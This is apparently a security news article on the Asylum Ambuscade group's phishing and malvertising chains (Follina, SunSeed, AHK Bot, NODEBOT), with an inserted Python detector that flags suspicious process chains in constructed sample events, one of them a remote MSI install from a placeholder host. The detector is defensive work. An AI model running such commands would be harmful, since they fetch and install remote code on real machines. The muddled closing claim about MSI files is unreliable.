2023-06-10

The cybercriminal group known as Asylum Ambuscade has been observed conducting both cybercrime and cyber espionage operations since at least 2020.

Asylum Ambuscade: who they are and what their goals are

“It is a crimeware group that targets banking customers and cryptocurrency traders in different regions including North America and Europe,” ESET said in an analysis published on Thursday. “Asylum Ambuscade also conducts espionage against government entities in Europe and Central Asia.”

The Asylum Ambuscade group was first documented by Proofpoint in March 2022, as an allegedly state-sponsored phishing campaign targeting European government entities in an effort to obtain intelligence about the movement of refugees and supplies in the region.

The group's goal, according to the Slovak IT security company, is to steal confidential information and email access credentials from official government email portals.

The attacks begin with a spear-phishing email carrying a malicious Excel spreadsheet attachment that, when opened, uses VBA code or exploits the Follina vulnerability (CVE-2022-30190) to download an MSI package from a remote server.

The installer then drops a downloader written in Lua called SunSeed (or its Visual Basic script equivalent), which in turn fetches an AutoHotkey-based malware known as AHK Bot from a remote server.

What is notable about Asylum Ambuscade is its cybercrime spree, which has affected over 4,500 victims worldwide since January 2022, most of them located in North America, Asia, Africa, Europe and South America.

“The selection of targets is very broad and mainly includes individuals, cryptocurrency traders and small and medium-sized businesses in different sectors,” said ESET researcher Matthieu Faou.

While one aspect of the attacks is designed to steal cryptocurrencies, targeting SMBs is likely an attempt to monetize access by selling it to other cybercriminal groups for illicit profits.

The chain of compromise follows a similar pattern, except for the initial intrusion vector: a spoofed Google ad or a Traffic Direction System (TDS) is used to steer potential victims to a fake website that serves a malicious JavaScript file.

The attacks also made use of a Node.js version of AHK Bot called NODEBOT, which is used to download plugins to capture screenshots, steal passwords, gather system information, and install additional trojans and stealers.
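Both delivery chains described above (an Excel attachment that, via VBA or Follina, pulls a remote MSI which leads to SunSeed and AHK Bot; and a fake website that serves a JavaScript file leading to NODEBOT) leave recognisable parent/child process relationships on the endpoint. The following is an added example, not code from the article or from ESET: it applies a handful of heuristic rules, which are my own assumptions modelled on the chains the article describes and not ESET's or Proofpoint's detection logic, to constructed process-creation events in a Sysmon-like shape (parent image, image, command line). All paths, user names, the `example.invalid` host and the file names are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Parent processes that should not normally spawn troubleshooters or installers.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Windows script hosts that run a downloaded .js file (the fake-website chain).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Interpreters the article names as later stages (AutoHotkey for AHK Bot, Node for NODEBOT).
STAGE_INTERPRETERS = {"autohotkey.exe", "node.exe"}
# Assumption: user-writable locations a dropped payload would typically run from.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata)\\", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """A minimal process-creation record, loosely modelled on Sysmon Event ID 1."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a label for a suspicious parent/child pattern, or None if nothing matched.

    The rules mirror the two chains in the article; they are heuristics, so a hit
    is a triage lead, not proof of compromise.
    """
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    cmd = ev.command_line.lower()

    # Office document spawning msdt.exe is the classic Follina (CVE-2022-30190) trace.
    if parent in OFFICE_APPS and child == "msdt.exe":
        return "office-spawned-msdt (Follina CVE-2022-30190 pattern)"
    # Office document driving msiexec at a remote URL: the "download an MSI package" step.
    if parent in OFFICE_APPS and child == "msiexec.exe" and re.search(r"https?://", cmd):
        return "office-spawned-msiexec-remote-package"
    # Script host executing a .js file from a user-writable folder: the fake-website chain.
    if child in SCRIPT_HOSTS and ".js" in cmd and USER_WRITABLE.search(ev.command_line):
        return "script-host-running-downloaded-js"
    # AutoHotkey or Node binary running from a user-writable path: later-stage loader.
    if child in STAGE_INTERPRETERS and USER_WRITABLE.search(ev.image):
        return "stage-interpreter-from-user-writable-path"
    return None


def triage(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, str]]:
    """Run classify() over a batch of events and keep only the hits."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append((ev, label))
    return hits


# Constructed sample telemetry (not real logs): four suspicious events, two benign ones.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\msdt.exe", "msdt.exe"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\msiexec.exe",
                 "msiexec.exe /i http://example.invalid/pkg.msi /qn"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\alice\Downloads\invoice.js"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Users\alice\AppData\Local\Temp\node.exe", "node.exe bot.js"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 "EXCEL.EXE report.xlsx"),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V"),
]

if __name__ == "__main__":
    for ev, label in triage(SAMPLE_EVENTS):
        print(f"{label}: {ev.parent_image} -> {ev.command_line}")
```

The rules are deliberately narrow (Office parent, remote URL, user-writable path) so that routine activity such as a service-started msiexec or a user opening a spreadsheet does not fire; in a real deployment the same logic would be expressed as a Sysmon or EDR rule and tuned against the environment's own baseline.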

Given that the attack chains are nearly identical between the cybercrime and espionage efforts, it is suspected that “Asylum Ambuscade is a cybercrime group that does some cyberespionage as a sideline.”

The overlaps also extend to another activity group called Screentimes, which targets companies in the US and Germany with customized malware designed to steal confidential information. Proofpoint also tracks the cybercriminal (or possibly group) under the name TA866.

“It is quite unusual for a group of cybercriminals to conduct dedicated cyber espionage operations,” said Faou, making it a rather rare occurrence in the cyber threat landscape.

Conclusions

As usual, it pays to be careful about what you download; simply put, that is the whole point.

It is no coincidence that MSI files (a Microsoft Windows installer package format) are involved: they can only be obtained by indirect means, and yet, sad to say, very often people go looking for them themselves.